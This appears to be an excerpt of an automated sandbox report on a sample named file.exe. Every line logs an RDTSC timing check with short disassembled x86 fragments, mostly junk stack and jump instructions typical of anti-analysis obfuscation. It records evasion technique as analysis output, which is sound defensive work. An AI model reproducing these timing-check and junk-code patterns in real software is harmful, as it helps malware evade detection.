                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110A0A1 second address: 110A0BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F9D1073AE66h 0x0000000f jmp 00007F9D1073AE6Eh 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110A0BE second address: 110A0C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110A0C7 second address: 110A0E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D1073AE78h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110A0E5 second address: 110A0F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D106F765Bh 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110A0F5 second address: 110A0FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110A0FC second address: 110A102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110A29F second address: 110A2BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F9D1073AE66h 0x0000000a jmp 00007F9D1073AE75h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110A59B second address: 110A59F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110A59F second address: 110A5B1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F9D1073AE66h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110A5B1 second address: 110A5B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110A5B5 second address: 110A5F4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9D1073AE66h 0x00000008 jmp 00007F9D1073AE6Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jo 00007F9D1073AE8Ch 0x00000015 jc 00007F9D1073AE72h 0x0000001b pushad 0x0000001c jo 00007F9D1073AE66h 0x00000022 jnp 00007F9D1073AE66h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110A734 second address: 110A740 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110A740 second address: 110A744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110AB4B second address: 110AB4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110AB4F second address: 110AB55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110AB55 second address: 110AB6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D106F765Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110B0FD second address: 110B103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110B103 second address: 110B10A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110B10A second address: 110B114 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F9D1073AE66h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110D65D second address: 110D667 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110D667 second address: 110D66B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110D810 second address: 110D815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110D815 second address: 110D81B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110D81B second address: 110D81F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110D81F second address: 110D831 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F9D1073AE6Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110D831 second address: 110D83B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110D83B second address: 110D83F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110D83F second address: 110D84B instructions: 0x00000000 rdtsc 0x00000002 jne 00007F9D106F7656h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110D84B second address: 110D856 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnc 00007F9D1073AE66h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110D856 second address: 110D85E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1110419 second address: 1110423 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F9D1073AE66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1110423 second address: 1110428 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1110428 second address: 1110471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D1073AE6Eh 0x00000009 pop esi 0x0000000a pushad 0x0000000b jmp 00007F9D1073AE6Ch 0x00000010 jc 00007F9D1073AE66h 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b jng 00007F9D1073AE8Eh 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F9D1073AE74h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1110471 second address: 1110475 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1110742 second address: 1110746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1110746 second address: 111075C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D106F765Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007F9D106F7656h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11108A6 second address: 11108B2 instructions: 0x00000000 rdtsc 0x00000002 js 00007F9D1073AE66h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11108B2 second address: 11108C0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 jnc 00007F9D106F765Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1113F3B second address: 1113F40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1113F40 second address: 1113F66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D106F765Bh 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jo 00007F9D106F7656h 0x00000017 popad 0x00000018 pushad 0x00000019 push edi 0x0000001a pop edi 0x0000001b push edi 0x0000001c pop edi 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11140AC second address: 11140B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11141F4 second address: 11141F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11141F8 second address: 1114212 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D1073AE70h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1114212 second address: 1114216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1114216 second address: 111421C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111421C second address: 1114221 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1117E25 second address: 1117E56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D1073AE75h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F9D1073AE76h 0x0000000f pop eax 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1117E56 second address: 1117E66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F9D106F7656h 0x0000000a jg 00007F9D106F7656h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11180B5 second address: 11180B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11180B9 second address: 11180DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 push esi 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop esi 0x0000000c jnl 00007F9D106F7666h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111DEC3 second address: 111DEC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111DEC7 second address: 111DF1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D106F7669h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F9D106F765Ah 0x00000010 jmp 00007F9D106F7661h 0x00000015 jmp 00007F9D106F7665h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push edx 0x0000001f pop edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111DF1E second address: 111DF2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jc 00007F9D1073AE6Eh 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111DF2F second address: 111DF33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111CADB second address: 111CAE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111CF18 second address: 111CF1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111CF1C second address: 111CF43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F9D1073AE77h 0x0000000c jg 00007F9D1073AE66h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111CF43 second address: 111CF48 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C9A0C second address: 10C9A66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jmp 00007F9D1073AE77h 0x0000000b pop ecx 0x0000000c popad 0x0000000d nop 0x0000000e mov cl, E2h 0x00000010 mov ebx, dword ptr [ebp+1247DAD7h] 0x00000016 mov dl, 8Ah 0x00000018 xor edi, dword ptr [ebp+122D2944h] 0x0000001e add eax, ebx 0x00000020 mov edi, dword ptr [ebp+122D2579h] 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 jl 00007F9D1073AE7Fh 0x0000002f jmp 00007F9D1073AE79h 0x00000034 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C9A66 second address: 10C9ADC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D106F7664h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007F9D106F7658h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 adc di, 9F77h 0x0000002b jmp 00007F9D106F765Ch 0x00000030 push 00000004h 0x00000032 mov dword ptr [ebp+122D2228h], ecx 0x00000038 push eax 0x00000039 pushad 0x0000003a jmp 00007F9D106F7668h 0x0000003f push ecx 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1125FCF second address: 1125FE8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F9D1073AE70h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1123FA1 second address: 1123FB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F9D106F7662h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1123FB7 second address: 1123FC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F9D1073AE66h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1123FC6 second address: 1123FD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1123FD3 second address: 1123FE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 ja 00007F9D1073AE6Ch 0x0000000b jc 00007F9D1073AE66h 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1123FE8 second address: 1123FEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1123FEC second address: 1123FF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112412A second address: 112412E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112412E second address: 112413A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112457F second address: 1124593 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9D106F765Dh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1124F0A second address: 1124F3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F9D1073AE7Ch 0x0000000b jmp 00007F9D1073AE74h 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F9D1073AE6Fh 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11254FC second address: 1125518 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 jmp 00007F9D106F7663h 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1125518 second address: 1125520 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1125520 second address: 1125524 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11257AB second address: 11257BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jp 00007F9D1073AE66h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112B486 second address: 112B4B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D106F7660h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007F9D106F765Ah 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F9D106F765Ch 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112B4B6 second address: 112B4BC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112B4BC second address: 112B4C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112F151 second address: 112F155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112E2C2 second address: 112E2CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112E2CB second address: 112E2DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D1073AE6Ch 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112E438 second address: 112E43D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112E43D second address: 112E443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112E443 second address: 112E44F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F9D106F7656h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112E70F second address: 112E713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112ECA8 second address: 112ECBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F9D106F765Eh 0x0000000b jbe 00007F9D106F7656h 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112ECBB second address: 112ECC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F9D1073AE66h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112ECC7 second address: 112ECCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112ECCB second address: 112ECEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F9D1073AE79h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112ECEE second address: 112ED04 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e jnc 00007F9D106F7656h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112EE98 second address: 112EEA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1134BAA second address: 1134BB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D106F765Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113513C second address: 1135140 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1135461 second address: 113547C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D106F7665h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113547C second address: 1135486 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F9D1073AE66h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1135607 second address: 1135613 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
